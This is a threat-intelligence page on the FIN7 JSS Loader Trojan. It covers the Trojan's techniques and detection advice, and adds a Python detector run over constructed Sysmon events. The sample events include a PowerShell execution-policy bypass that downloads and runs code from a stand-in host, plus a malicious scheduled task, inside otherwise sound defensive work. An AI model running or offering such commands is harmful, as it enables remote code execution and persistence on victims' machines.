JSS Loader is a remote access Trojan (RAT) that the FIN7 group has used since at least 2020. It targets the Windows operating system and can download and execute additional malicious files. It is typically delivered through phishing emails carrying malicious Microsoft Excel attachments.
JSS Loader Malware Capabilities:
- JSS Loader may abuse the Windows Task Scheduler to schedule initial or recurring execution of malicious code (ATT&CK T1053.005, Scheduled Task).
- JSS Loader may transfer tools or other files from an external system into the compromised environment (T1105, Ingress Tool Transfer).
- Its operators send spearphishing emails with a malicious attachment in an attempt to gain initial access to victim systems (T1566.001, Spearphishing Attachment).
Ways to Detect and Mitigate JSS Loader Malware Attacks
- JSS Loader activity can be detected by monitoring process execution, file creation, and files transferred into the network. Network intrusion detection systems and email gateways can detect spearphishing with malicious attachments in transit; quarantining or sandboxing Excel attachments at the gateway reduces the chance that a payload reaches a user at all.
- Monitor the execution of, and command-line arguments for, applications that an adversary may use to gain initial access and that require user interaction. This includes compression utilities, such as zip tools, that can be used to deobfuscate or decode files or information in payloads. Also monitor for events associated with script execution: process activity, use of the Windows Script Host (wscript.exe, cscript.exe), file activity involving scripts, and loading of modules associated with scripting languages. An Office application such as Excel spawning a script host or PowerShell is a strong indicator that a malicious attachment has been opened.
- PowerShell's execution policy is not a security boundary: even where a restrictive policy is set, an adversary who obtains administrator or SYSTEM access can redefine it, either through the Registry or on the command line (for example with -ExecutionPolicy Bypass). A change to the policy is therefore itself a useful signal of malicious PowerShell use. If PowerShell is not used in an environment, simply alerting on any PowerShell execution may surface malicious activity; where it is used, enable script block and module logging so that the content of executed scripts is recorded.
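The detection points listed above (Office spawning a script host, scheduled tasks pointing at user-writable paths, PowerShell execution-policy bypass and download cradles, and execution-policy changes in the Registry) can be expressed as simple host-side rules. The following is an added example, not code from the original page or from any vendor: it runs those rules over a handful of constructed Sysmon-style events (process creation, EventID 1; registry value set, EventID 13). The field names follow Sysmon's schema; the events, user paths and the URL are invented for the example, and the ATT&CK IDs in the alerts are the ones the capabilities above map to.

```python
"""Toy host-side detection rules for the JSS Loader behaviours described on
this page, run over constructed Sysmon-style events.  Field names follow
Sysmon's schema; the sample events themselves are constructed, not real."""
import re
from dataclasses import dataclass

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
USER_WRITABLE = re.compile(r"\\(appdata|temp|programdata|public|downloads)\\", re.I)
PS_POLICY_BYPASS = re.compile(r"-(?:ep|ex|exec|executionpolicy)\s+(?:bypass|unrestricted)", re.I)
PS_ENCODED = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+\S", re.I)
PS_DOWNLOAD = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer", re.I)
# Registry value that stores the machine-wide PowerShell execution policy (real path, lower-cased).
EXEC_POLICY_KEY = r"\microsoft\powershell\1\shellids\microsoft.powershell\executionpolicy"


@dataclass(frozen=True)
class Alert:
    rule: str
    technique: str  # ATT&CK technique ID the rule maps to
    detail: str


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def check_event(ev: dict) -> list[Alert]:
    """Return every rule a single event trips (one event may trip several)."""
    alerts: list[Alert] = []
    if ev.get("EventID") == 1:
        image = basename(ev.get("Image", ""))
        parent = basename(ev.get("ParentImage", ""))
        cmd = ev.get("CommandLine", "")
        # Malicious attachment: an Office process launching a script host or PowerShell.
        if parent in OFFICE_APPS and image in SCRIPT_HOSTS | POWERSHELL:
            alerts.append(Alert("office_spawns_script_host", "T1204.002", f"{parent} -> {image}"))
        # Scheduled task whose action lives in a user-writable directory.
        if image == "schtasks.exe" and re.search(r"/create\b", cmd, re.I) and USER_WRITABLE.search(cmd):
            alerts.append(Alert("schtasks_user_writable_action", "T1053.005", cmd))
        if image in POWERSHELL:
            # Execution policy bypassed, or the command encoded, on the command line.
            if PS_POLICY_BYPASS.search(cmd) or PS_ENCODED.search(cmd):
                alerts.append(Alert("powershell_bypass_or_encoded", "T1059.001", cmd))
            # Download cradle: a tool or file being pulled in from an external system.
            if PS_DOWNLOAD.search(cmd):
                alerts.append(Alert("powershell_download_cradle", "T1105", cmd))
    elif ev.get("EventID") == 13:
        target = ev.get("TargetObject", "")
        # Execution policy redefined through the Registry rather than Set-ExecutionPolicy.
        if target.lower().endswith(EXEC_POLICY_KEY):
            alerts.append(Alert("executionpolicy_registry_change", "T1059.001",
                                f"{target} = {ev.get('Details', '')}"))
    return alerts


def scan(events: list[dict]) -> list[Alert]:
    return [a for ev in events for a in check_event(ev)]


# Constructed sample telemetry: four suspicious events followed by two benign ones.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "CommandLine": r'wscript.exe "C:\Users\alice\AppData\Local\Temp\invoice.js"'},
    {"EventID": 1, "Image": r"C:\Windows\System32\schtasks.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'schtasks.exe /create /tn Updater /sc minute /mo 5 /tr "C:\Users\alice\AppData\Roaming\upd.exe"'},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": "powershell.exe -ep bypass -w hidden -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://stage.example.invalid/s2')\""},
    {"EventID": 13, "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell\ExecutionPolicy",
     "Details": "Unrestricted"},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\schtasks.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "CommandLine": "schtasks.exe /query /fo list"},
]

if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(f"[{a.technique}] {a.rule}: {a.detail}")
```

Run against the constructed events, the scan raises five alerts: one for Excel launching wscript.exe, one for the scheduled task whose action sits under AppData, two for the PowerShell process (execution-policy bypass and a download cradle), and one for the Registry write to the ExecutionPolicy value; the two benign events produce nothing. The parent-process rule is the one worth tuning first in a real environment, since a handful of legitimate add-ins do spawn script hosts from Office; the Registry rule, by contrast, should almost never fire outside change windows.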